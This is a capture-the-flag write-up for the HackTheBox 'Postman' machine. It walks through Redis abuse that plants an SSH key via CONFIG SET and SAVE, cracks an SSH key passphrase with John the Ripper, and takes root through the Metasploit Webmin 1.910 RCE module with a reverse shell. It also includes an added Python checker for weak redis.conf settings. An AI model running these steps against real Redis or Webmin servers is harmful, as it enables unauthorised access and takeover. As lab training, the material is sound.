Postman
Always stay close to what keeps you feeling alive!
Postman is an easy difficulty machine running Linux. It tests your knowledge in OSINT, Redis exploitation and basic Privilege Escalation through a known exploit. There is nothing overly complicated about this machine as long as you stick to basic enumeration and don’t get too carried away.
Be sure to check out the Basic Setup section before you get started.
Enumeration
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
Portscan
portscan postman.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-02 06:11 PST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geeks Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesnt have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.36 seconds
From the output we see that we have a website on port 80, as well as redis on port 6379 and webmin on port 10000.
Directory Bruteforce
Doing a scan with Gobuster using the dir mode reveals some files and directories:
gobuster dir -u http://postman.htb -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html -o gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://postman.htb
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Follow Redir: true
[+] Timeout: 10s
===============================================================
2019/12/02 06:16:32 Starting gobuster
===============================================================
/css (Status: 200)
/fonts (Status: 200)
/images (Status: 200)
/index.html (Status: 200)
/js (Status: 200)
/server-status (Status: 403)
/upload (Status: 200)
===============================================================
2019/12/02 06:22:02 Finished
===============================================================
An interesting find is the upload directory!
Domains
Let’s check out the website at http://postman.htb. Nothing exciting. Let’s check the upload directory instead. We find nothing useful and cannot find an upload form. Let’s move on for now.
Webmin
Checking exploitdb for anything useful, we find the following vulnerability relating to our webmin version:
searchsploit webmin 1.910
------------------------------------------------------------------------ ------------------------------------
Exploit Title                                                            | Path (/usr/share/exploitdb/)
------------------------------------------------------------------------ ------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)   | exploits/linux/remote/46984.rb
------------------------------------------------------------------------ ------------------------------------
Shellcodes: No Result
Papers: No Result
Taking a look at this exploit we see that it requires valid credentials.
Redis
Let’s do a quick test and see if we can access redis without credentials using the tool redis-cli:
redis-cli -h postman.htb -p 6379 set with_space 'boo'
OK
Looks promising! We can connect with redis-cli -h postman.htb -p 6379, where we find that we can change various settings using the config set command.
Having redis installed on our local machine allows us to research how redis is installed and configured. We find that a user named redis is created and that the home directory for this default user is /var/lib/redis. So far it seems we can only write with save in /var/lib/redis, so we will focus on that area.
User
After a quick web search we find a vulnerability with misconfigured redis servers which may allow us to log in via SSH. If you remember from our nmap scan, the ssh port 22 is open.
Let’s give this a try:
First we create an RSA key pair:
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:BHSzzWs/IESstXc+Zseq/OVFX9JdCu0oJNeKdSZkMrs root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .o.* o |
| +o@ . . |
| o*.B = . .|
| .o.B.*.+ oo|
| E.*o..+ =|
| o += ooo|
| oo+. o|
| . .+ . |
| oo. . |
+----[SHA256]-----+
Now let’s take our key and put it in a text file with new lines either side. I am assuming this is needed for when we parse it with redis:
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > ssh.txt
We will now flush the Redis datastore:
redis-cli -h postman.htb flushall
OK
And write the ssh.txt file we created into a key on the Redis server via the redis-cli command:
cat ssh.txt | redis-cli -h postman.htb -x set ssh
OK
Now we will connect to the redis-server, set the dir option to /var/lib/redis/.ssh and confirm that the option has been updated successfully:
redis-cli -h postman.htb
postman.htb:6379> config set dir /var/lib/redis/.ssh
OK
postman.htb:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
We then set the name of the file we want to save to the dir location and check that the option has been updated successfully:
postman.htb:6379> config set dbfilename "authorized_keys"
OK
postman.htb:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"
Now for the moment of truth. Can we save our ssh key to the .ssh folder? Let’s see:
postman.htb:6379> save
OK
Yes we can. The file was saved successfully.
Now to try logging in via ssh:
ssh -i ~/.ssh/id_rsa -l redis postman.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$
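The settings that let the steps above succeed (Redis reachable from the network, no password, and CONFIG SET dir/dbfilename followed by SAVE writing into the redis user's home) are all visible in redis.conf. Here is a small auditor for that file, added as an example and not part of the original write-up or of Redis itself; the two configs it checks are constructed samples, and the defaults it assumes for missing directives (no bind means all interfaces, protected-mode yes) follow the Redis documentation.

```python
"""Flag the redis.conf settings that make an RDB-to-authorized_keys write possible.

Added example; the sample configs below are constructed, not the box's real file.
"""
import shlex

# Constructed sample matching the posture seen on the box (assumed).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed hardened counterpart: loopback only, AUTH required, CONFIG disabled.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass "a-long-random-secret"
rename-command CONFIG ""
dir /var/lib/redis
dbfilename dump.rdb
"""


def parse_redis_conf(text):
    """Return {directive: [[args, ...], ...]}; the last occurrence ([-1]) is the effective one."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)          # handles quoted values such as rename-command CONFIG ""
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_redis_conf(text)
    findings = []
    binds = conf.get("bind", [[]])[-1]     # no bind directive = listen on every interface
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: instance reachable on all interfaces")
    if conf.get("protected-mode", [["yes"]])[-1][:1] == ["no"]:
        findings.append("protected-mode no: remote clients are not refused on an exposed, password-less instance")
    if not conf.get("requirepass"):
        findings.append("no requirepass: any client can run commands without AUTH")
    renames = {a[0].upper(): (a[1] if len(a) > 1 else "") for a in conf.get("rename-command", []) if a}
    if renames.get("CONFIG", "CONFIG") != "":
        findings.append("CONFIG usable: dir/dbfilename can be retargeted and SAVE writes a file there")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or ["ok"])
```

Run it against the real /etc/redis/redis.conf on a host you administer; any finding on an instance that is reachable from untrusted networks is worth fixing, and `rename-command CONFIG ""` alone stops the dir/dbfilename change used above.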
The first thing we notice is that there is no user.txt in the redis user’s home directory. A quick look in /home shows the directory Matt, which contains the user.txt flag:
redis@Postman:~$ ls -l /home/Matt/user.txt
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt
We will need to get access to the Matt account.
Having a look around /var/lib/redis we can see there is the usual .bash_history file, which we have read access to. Viewing the contents we see commands that have been executed by Matt:
redis@Postman:~$ cat .bash_history
exit
su Matt
pwd
nano scan.py
python scan.py
nano scan.py
clear
nano scan.py
clear
python scan.py
exit
exit
cat /etc/ssh/sshd_config
su Matt
clear
cd /var/lib/redis
su Matt
exit
cat id_rsa.bak
We quickly notice the file id_rsa.bak. We are obviously going with an ssh theme here.
Let’s do a search for the file:
redis@Postman:~$ find / -name id_rsa.bak 2>&1 | grep -v "Permission denied"
/opt/id_rsa.bak
Nice. Let’s try and use it straight away and see if there is a passphrase:
redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak':
Looks like Matt isn’t a complete idiot.
We will need to crack the key. John The Ripper will work well for this because we will need to convert the key to a readable format, and john can do just that with ssh2john:
python ssh2john.py ~/Documents/postman/id_rsa.bak > ~/Documents/postman/id_rsa.hash
If you are using Kali you will find that ssh2john isn’t installed. You can download it from here.
Now let’s crack the hash:
john --wordlist=/root/Wordlists/passwords/passwords.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
com....08 (/root/Documents/postman/id_rsa.bak)
4g 0:00:02:44 DONE (2019-12-03 10:44) 0.02431g/s 1841Kp/s 1841Kc/s 1841KC/s 233091..hielox
Session completed
Ok, I take back what I said. Matt’s an idiot! Now let’s try and log in via ssh locally from the redis shell:
redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak':
Connection closed by ::1 port 22
Looks like we have an issue. The passphrase worked but Matt may not be allowed to ssh in. This reminds me that there was a command in .bash_history where Matt was messing around with /etc/ssh/sshd_config, the configuration file for the ssh server. Taking a look we can see that Matt has logging in via ssh disabled:
redis@Postman:~$ cat /etc/ssh/sshd_config | grep DenyUsers
DenyUsers Matt
Let’s try the password with su instead:
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$
We can now grab the user flag in Matt’s home directory:
Matt@Postman:~$ cat user.txt
517ad0ec24....aac08a2f3c
On to root!
Root
Let’s go check out the webmin exploit we saw earlier that required valid credentials, as that may be the way to go. It was Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit), which is a Metasploit module:
msf5 > search type:exploit name:webmin package
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD com....08
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost <attacker-ip>
lhost => 10.10.14.40
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts postman.htb
rhosts => postman.htb
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.40:4444
[+] Session cookie: 501c01341b72936a3e2c8cc9db790a16
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.40:4444 -> 10.10.10.160:36478) at 2019-12-03 11:02:32 -0800
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a257741c....5686ddce
And we are done :)
Conclusion
This machine was straightforward with sufficient research to establish how things work. Misconfigured Redis servers have been a real issue in the past and can still be found today in the wild. Overall this was an enjoyable machine.